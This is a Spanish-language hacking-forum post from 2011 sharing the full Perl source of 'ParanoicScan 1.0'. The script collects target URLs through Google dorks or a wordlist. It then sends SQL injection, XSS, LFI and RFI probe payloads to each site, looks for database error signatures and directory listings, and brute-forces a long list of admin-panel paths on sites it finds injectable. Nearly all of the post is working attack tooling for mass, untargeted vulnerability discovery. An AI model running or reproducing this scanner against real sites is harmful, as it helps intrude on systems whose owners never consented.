elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Perl] ParanoicScan 1.0
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Perl] ParanoicScan 1.0  (Leído 2,200 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Perl] ParanoicScan 1.0
« en: 3 Diciembre 2011, 16:32 pm »

Lo mismo que la anterior version solo se le agrego
un buscado de paneladmin y una nueva opcion para buscar listado de directorios en las paginas que estamos escaneando

Código
  1. #!usr/bin/perl
  2. #Paranoic Scan 1.0 Updated
  3. #(c)0ded by Doddy H 2011
  4. #
  5. #Search in google with a dork
  6. #Scan type :
  7. #
  8. #XSS
  9. #Full Source Discloure
  10. #LFI
  11. #RFI
  12. #SQL GET & POST + admin
  13. #Directory listing
  14. #MSSQL
  15. #Oracle
  16. #Jet Database
  17. #Find HTTP Options y Server nAME
  18. #
  19. #
  20.  
  21. use LWP::UserAgent;
  22. use HTML::LinkExtor;
  23. use HTML::Form;
  24. use URI::Split qw(uri_split);
  25. use IO::Socket;
  26.  
  27.  
  28. my @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
  29. ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
  30. ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
  31. ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
  32. ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
  33. ,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
  34. ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
  35. ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
  36. ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
  37. ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
  38. ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
  39. ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
  40. ,'administration/','administration/index.php','administration/login.php'
  41. ,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
  42. ,'system/login.php','admin.php','login.php','administrador.php','administration.php'
  43. ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
  44. ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
  45. ,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
  46. ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
  47. ,'administrator/','administrator/index.html','administrator/login.html'
  48. ,'administrator/account.html','administrator/account.php','administrator.html','login.html'
  49. ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
  50. ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
  51. ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
  52. ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
  53. ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
  54. ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
  55. ,'administrator/login.asp','administrator/account.asp','administrator.asp'
  56. ,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
  57. ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
  58. ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
  59. ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
  60. ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
  61. ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
  62. ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
  63. ,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
  64. ,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
  65. ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
  66. ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
  67. ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
  68. ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
  69. ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
  70. ','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
  71. ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
  72. ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
  73. ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
  74. ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
  75. ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
  76. ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
  77. ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
  78. ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
  79. ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
  80. ,'server/','database_administration/','power_user/','system_administration/'
  81. ,'ss_vms_admin_sm/');
  82.  
  83. my $nave = LWP::UserAgent->new;
  84. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  85. $nave->timeout(5);
  86.  
  87. installer();
  88.  
  89. sta();
  90.  
  91. sub sta {
  92. sub head {
  93. system 'cls';
  94.  
  95.  
  96. @@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
  97. @  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @
  98. @  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @
  99. @@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @
  100. @    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @
  101. @    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@
  102. @@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @
  103.  
  104.  
  105.  
  106.  
  107. );
  108. }
  109. &menu;
  110. sub menu {
  111. &head;
  112. print "[a] : Scan a File\n";
  113. print "[b] : Search in google and scan the webs\n\n";
  114. print "[option] : ";
  115. chomp(my $op = <STDIN>);
  116. if ($op =~/a/ig) {
  117. print "\n[+] Wordlist : ";
  118. chomp(my $word = <STDIN>);
  119. my @paginas = repes(cortar(savewords($word)));
  120. my $option = &men;
  121. print "\n\n[+] Opening File\n";
  122. scan($option,@paginas);
  123. }
  124. elsif ($op=~/b/ig) {
  125. print "\n[+] Dork : ";
  126. chomp(my $dork = <STDIN>);
  127. print "[+] Pages : ";
  128. chomp(my $pag = <STDIN>);
  129. my $option = &men;
  130. print "\n\n[+] Searching in google\n";
  131. my @paginas = &google($dork,$pag);
  132. scan($option,@paginas);
  133. }
  134. else {
  135. &menu;
  136. }
  137. }
  138. sub scan {
  139. my ($option,@webs) = @_;
  140. print "\n\n[Status] : Scanning\n";
  141. print "[Webs Count] : ".int(@webs)."\n\n";
  142. for(@webs) {
  143. if ($option=~/S/ig) {
  144. scansql($_);
  145. }
  146. if ($option=~/K/ig) {
  147. sql($_);
  148. }
  149. if ($option=~/Q/ig) {
  150. sqladmin($_);
  151. }
  152. if ($option=~/Y/ig) {
  153. simple($_);
  154. }
  155. if ($option=~/L/ig) {
  156. lfi($_);
  157. }
  158. if ($option=~/R/ig) {
  159. rfi($_);
  160. }
  161. if ($option=~/F/ig) {
  162. fsd($_);
  163. }
  164. if ($option=~/X/ig) {
  165. scanxss($_);
  166. }
  167. if ($option=~/M/ig) {
  168. mssql($_);
  169. }
  170. if ($option=~/J/ig) {
  171. access($_);
  172. }
  173. if ($option=~/O/ig) {
  174. oracle($_);
  175. }
  176. if ($option=~/HT/ig) {
  177. http($_);
  178. }
  179. if ($option=~/A/ig) {
  180. scansql($_);
  181. scanxss($_);
  182. mssql($_);
  183. access($_);
  184. oracle($_);
  185. lfi($_);
  186. rfi($_);
  187. fsd($_);
  188. http($_);
  189. }
  190. }
  191. }
  192. print "\n\n[Status] : Finish\n";
  193. &finish;
  194. }
  195.  
  196. sub toma {
  197. return $nave->get($_[0])->content;
  198. }
  199.  
  200. sub tomaz {
  201. return $nave->get($_[0]);
  202. }
  203.  
  204. sub savefile {
  205. open(SAVE,">>logs/".$_[0]);
  206. print SAVE $_[1]."\n";
  207. close SAVE;
  208. }
  209.  
  210. sub finish {
  211. print "\n\n\n(C) Doddy Hackman 2010\n\n";
  212. <STDIN>;
  213. sta();
  214. }
  215.  
  216. sub google {
  217. my($a,$b) = @_;
  218. for ($pages=10;$pages<=$b;$pages=$pages+10) {
  219. $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
  220. my @links = get_links($code);
  221. for my $l(@links) {
  222. if ($l =~/webcache.googleusercontent.com/) {
  223. push(@url,$l);
  224. }
  225. }
  226. }
  227.  
  228. for(@url) {
  229. if ($_ =~/cache:(.*?):(.*?)\+/) {
  230. push(@founds,$2);
  231. }
  232. }
  233.  
  234. my @founds = repes(cortar(@founds));
  235. return @founds;
  236. }
  237.  
  238. sub sql {
  239. my ($pass1,$pass2) = ("+","--");
  240. my $page = shift;
  241. $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
  242. if ($code1=~/The used SELECT statements have a different number of columns/ig) {
  243. print "[+] SQLI : $page\a\n";
  244. savefile("sql-logs.txt",$page);
  245. }}
  246.  
  247. sub sqladmin {
  248. my ($pass1,$pass2) = ("+","--");
  249. my $page = shift;
  250. $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
  251. if ($code1=~/The used SELECT statements have a different number of columns/ig) {
  252. print "\n[+] SQLI : $page\a\n";
  253. savefile("sql-logs.txt",$page);
  254.  
  255. my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
  256.  
  257. my $fage = "http://".$auth;
  258.  
  259. for $path(@panels) {
  260. $code = tomaz($fage."/".$path);
  261. if ($code->is_success) {
  262. print "[+] Link : ".$fage."/".$path."\n";
  263. savefile("admin-logs.txt",$fage."/".$path);
  264. }}}}
  265.  
  266. sub http {
  267.  
  268. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  269.  
  270. my $socket = IO::Socket::INET->new(
  271. PeerAddr=>$auth,
  272. PeerPort=>"80",
  273. Proto=>"tcp");
  274.  
  275. print $socket "OPTIONS  / HTTP/1.0\r\n\r\n";
  276. read $socket,$resultado,"1000";
  277.  
  278. if ($resultado=~/Server:(.*)/g) {
  279. my $server = $1;
  280.  
  281. savefile("http-logs.txt","[+] Page : $auth"."\n");
  282. savefile("http-logs.txt","[+] Server : ".$server."\n");
  283. }
  284. if ($resultado=~/Allow: (.*)/g) {
  285. my $options = $1;
  286. savefile("http-logs.txt","[+] Options : ".$options."\n");
  287. }
  288. $socket->close;
  289. }
  290.  
  291. sub scanxss {
  292.  
  293. my $page = shift;
  294. chomp $page;
  295.  
  296. my @testar = HTML::Form->parse(toma($page),"/");
  297. my @botones_names;
  298. my @botones_values;
  299. my @orden;
  300. my @pa = ("<script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>",'"><script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>');
  301. my @get_founds;
  302. my @post_founds;
  303. my @ordenuno;
  304. my @ordendos;
  305.  
  306. my $contador_forms = 0;
  307.  
  308. my $valor = "doddyhackman";
  309.  
  310. for my $test(@testar) {
  311. $contador_forms++;
  312. if ($test->method eq "POST") {
  313. my @inputs = $test->inputs;
  314. for my $in(@inputs) {
  315. if ($in->type eq "submit") {
  316. if ($in->name eq "") {
  317. push(@botones_names,"submit");
  318. }
  319. push(@botones_names,$in->name);
  320. push(@botones_values,$in->value);
  321. } else {
  322. push(@ordenuno,$in->name,$pa[0]);
  323. push(@ordendos,$in->name,$pa[1]);
  324. }}
  325.  
  326. for my $n(0..int(@botones_names)-1) {
  327. my @preuno = @ordenuno;
  328. my @predos = @ordendos;
  329. push(@preuno,$botones_names[$n],$botones_values[$n]);
  330. push(@predos,$botones_names[$n],$botones_values[$n]);
  331.  
  332. my $codeuno = $nave->post($page,\@preuno)->content;
  333. my $codedos = $nave->post($page,\@predos)->content;
  334. if ($codeuno=~/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig or
  335. $codedos=~/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig) {
  336. if ($test->attr(name) eq "" or $test->attr(name) eq " ") {
  337. push(@post_founds,$contador_forms);
  338. } else {
  339. push(@post_founds,$test->attr(name));
  340. }}}
  341. } else { #Fin de metodo POST
  342. my @inputs = $test->inputs;
  343. for my $in(@inputs) {
  344. if ($in->type eq "submit") {
  345. if ($in->name eq "") {
  346. push(@botones_names,"submit");
  347. }
  348. push(@botones_names,$in->name);
  349. push(@botones_values,$in->value);
  350. } else {
  351. $orden.=''.$in->name.'='.$valor.'&';
  352. }}
  353. chop($orden);
  354. for my $n(0..int(@botones_names)-1) {
  355. my $partedos = "&".$botones_names[$n]."=".$botones_values[$n];
  356. my $final = $orden.$partedos;
  357. for my $strin(@pa) {
  358. chomp $strin;
  359. $final=~s/doddyhackman/$strin/;
  360. $code = toma($page."?".$final);
  361. my $strin = "\Q$strin\E";
  362. if ($code=~/$strin/) {
  363. push(@get_founds,$page."?".$final);
  364. }}}}}
  365.  
  366. my @get_founds = repes(@get_founds);
  367. if (int(@get_founds) ne 0) {
  368. for(@get_founds) {
  369. savefile("xss-logs.txt","[+] XSS Found : $_");
  370. print "[+] XSS Found : $_\n\a";
  371. }}
  372.  
  373. my @post_founds = repes(@post_founds);
  374. if (int(@post_founds) ne 0) {
  375. for my $t(@post_founds) {
  376. if ($t =~/^\d+$/) {
  377. savefile("xss-logs.txt","[+] XSS : Form $t in $page");
  378. print "[+] XSS : Form $t in $page\n\a";
  379. }}}}
  380.  
  381.  
  382. sub simple {
  383.  
  384. my $code  = toma($_[0]);
  385. my @links = get_links($code);
  386.  
  387. for my $com (@links) {
  388. my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
  389. if ( $path =~ /\/(.*)$/ ) {
  390. my $path1 = $1;
  391. $_[0] =~ s/$path1//ig;
  392. my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
  393. if ( $path =~ /(.*)\// ) {
  394. my $parche = $1;                                
  395. unless($repetidos=~/$parche/){
  396. $repetidos.=" ".$parche;
  397. my $code=toma("http://".$auth.$parche);    
  398. if ($code =~ /Index of (.*)</ig ) {
  399. my $dir_found = $1;
  400. chomp $dir_found;
  401. print "[+] Directory Found : "."http://".$auth.$parche."\n";
  402. savefile("dir-logs.txt","[+] Directory Found : "."http://".$auth.$parche);
  403. }}}}}}
  404.  
  405. sub scansql {
  406.  
  407. my $page = shift;
  408. my $copia = $page;
  409.  
  410. $co = toma($page."'");
  411.  
  412. if ($co=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $co=~ /mysql_free_result/ig || $co =~ /mysql_fetch_assoc/ig ||$co =~ /mysql_num_rows/ig || $co =~ /mysql_fetch_array/ig || $co =~/mysql_fetch_assoc/ig || $co=~/mysql_query/ig || $co=~/mysql_free_result/ig || $co=~/equivocado en su sintax/ig || $co=~/You have an error in your SQL syntax/ig || $co=~/Call to undefined function/ig) {
  413. savefile("sql-logs.txt","[+] SQL : $page");
  414. print "[+] SQLI : $page\a\n";
  415. } else {
  416.  
  417. if ($page=~/(.*)\?(.*)/) {
  418. my $page = $1;
  419.  
  420. my @testar = HTML::Form->parse(toma($page),"/");
  421. my @botones_names;
  422. my @botones_values;
  423. my @orden;
  424. my @get_founds;
  425. my @post_founds;
  426. my @ordenuno;
  427. my @ordendos;
  428.  
  429. my $contador_forms = 0;
  430.  
  431. my $valor = "doddyhackman";
  432.  
  433. for my $test(@testar) {
  434. $contador_forms++;
  435. if ($test->method eq "POST") {
  436. my @inputs = $test->inputs;
  437. for my $in(@inputs) {
  438. if ($in->type eq "submit") {
  439. if ($in->name eq "") {
  440. push(@botones_names,"submit");
  441. }
  442. push(@botones_names,$in->name);
  443. push(@botones_values,$in->value);
  444. } else {
  445. push(@ordenuno,$in->name,"'");
  446. }}
  447.  
  448. for my $n(0..int(@botones_names)-1) {
  449. my @preuno = @ordenuno;
  450. push(@preuno,$botones_names[$n],$botones_values[$n]);
  451. my $code = $nave->post($page,\@preuno)->content;
  452. if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
  453. if ($test->attr(name) eq "" or $test->attr(name) eq " ") {
  454. push(@post_founds,$contador_forms);
  455. } else {
  456. push(@post_founds,$test->attr(name));
  457. }}}}
  458.  
  459. my @post_founds = repes(@post_founds);
  460. if (int(@post_founds) ne 0) {
  461. for my $t(@post_founds) {
  462. if ($t =~/^\d+$/) {
  463. savefile("sql-logs.txt","[+] SQLI : Form $t in $page");
  464. print "[+] SQLI : Form $t in $page\n\a";
  465. }}}}}}}
  466.  
  467. sub access {
  468.  
  469. my $page = shift;
  470. $code1 = toma($page."'");
  471. if ($code1=~/Microsoft JET Database/ig or $code1=~/ODBC Microsoft Access Driver/ig) {
  472. print "[+] Jet DB : $page\a\n";
  473. savefile("jetdb-logs.txt",$page);
  474. }
  475. }
  476.  
  477. sub mssql {
  478.  
  479. my $page = shift;
  480. $code1 = toma($page."'");
  481. if ($code1=~/ODBC SQL Server Driver/ig) {
  482. print "[+] MSSQL : $page\a\n";
  483. savefile("mssql-logs.txt",$page);
  484. }
  485. }
  486.  
  487. sub oracle {
  488.  
  489. my $page = shift;
  490. $code1 = toma($page."'");
  491. if ($code1=~/Microsoft OLE DB Provider for Oracle/ig) {
  492. print "[+] Oracle : $page\a\n";
  493. savefile("oracle-logs.txt",$page);
  494. }
  495. }
  496.  
  497. sub rfi {
  498. my $page = shift;
  499. $code1 = toma($page."http:/www.supertangas.com/");
  500. if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD
  501. print "[+] RFI : $page\a\n";
  502. savefile("rfi-logs.txt",$page);
  503. }}
  504.  
  505. sub lfi {
  506. my $page = shift;
  507. $code1 = toma($page."'");
  508. if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
  509. print "[+] LFI : $page\a\n";
  510. savefile("lfi-logs.txt",$page);
  511. }}
  512.  
  513. sub fsd {
  514. my $page = shift;
  515. my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
  516. if ($path=~/\/(.*)$/) {
  517. my $me = $1;
  518. $code1 = toma($page.$me);
  519. if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
  520. print "[+] Full Source Discloure : $page\a\n";
  521. savefile("fpd-logs.txt",$page);
  522. }}}
  523.  
  524. sub repes {
  525. my @limpio;
  526. foreach $test(@_) {
  527. push @limpio,$test unless $repe{$test}++;
  528. }
  529. return @limpio;
  530. }
  531.  
  532. sub savewords {
  533. open(FILE,$_[0]);
  534. @words = <FILE>;
  535. close FILE;
  536. for(@words) {
  537. push(@r,$_);
  538. }
  539. return(@r);
  540. }
  541.  
  542. sub men {
  543. print "\n\n[+] Scan Type : \n\n";
  544. print "[X] : XSS\n";
  545. print "[S] : SQL GET/POST\n";#
  546. print "[K] : SQL GET\n";
  547. print "[Q] : SQL GET + Admin\n";
  548. print "[Y] : Directory listing\n";#
  549. print "[M] : MSSQL\n";
  550. print "[J] : Jet Database\n";
  551. print "[O] : Oracle\n";
  552. print "[L] : LFI\n";
  553. print "[R] : RFI\n";
  554. print "[F] : Full Source Discloure\n";
  555. print "[HT] : HTTP Information\n";
  556. print "[A] : All\n\n";
  557. print "\n[Options] : ";
  558. chomp(my $option = <STDIN>);
  559. return $option;
  560. }
  561.  
  562. sub cortar {
  563. my @nuevo;
  564. for(@_) {
  565. if ($_ =~/=/) {
  566. @tengo = split("=",$_);
  567. push(@nuevo,@tengo[0]."=");
  568. } else {
  569. push(@nuevo,$_);
  570. }}
  571. return @nuevo;
  572. }
  573.  
  574. sub get_links {
  575.  
  576. $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
  577. return @links;
  578.  
  579. sub agarrar {
  580. my ($a,%b) = @_;
  581. push(@links,values %b);
  582. }
  583. }
  584.  
  585.  
  586. sub installer {
  587. unless (-d "logs/") {
  588. mkdir("logs/","777");
  589. }
  590. }
  591.  
  592. # ¿ The End ?
  593.  


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Libros de Perl online [PERL]
Scripting
madpitbull_99 0 4,060 Último mensaje 18 Mayo 2011, 21:49 pm
por madpitbull_99
[Perl] Project ParanoicScan 1.0
Scripting
BigBear 0 1,686 Último mensaje 4 Agosto 2012, 16:02 pm
por BigBear
[Perl] Project ParanoicScan 1.7
Scripting
BigBear 0 2,112 Último mensaje 1 Enero 2014, 04:56 am
por BigBear
[Python-Android] ParanoicScan 0.3
Python
BigBear 1 2,458 Último mensaje 10 Febrero 2014, 15:32 pm
por adastra
[Python-Android] ParanoicScan 0.4
Python
BigBear 0 1,727 Último mensaje 6 Noviembre 2015, 21:08 pm
por BigBear
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines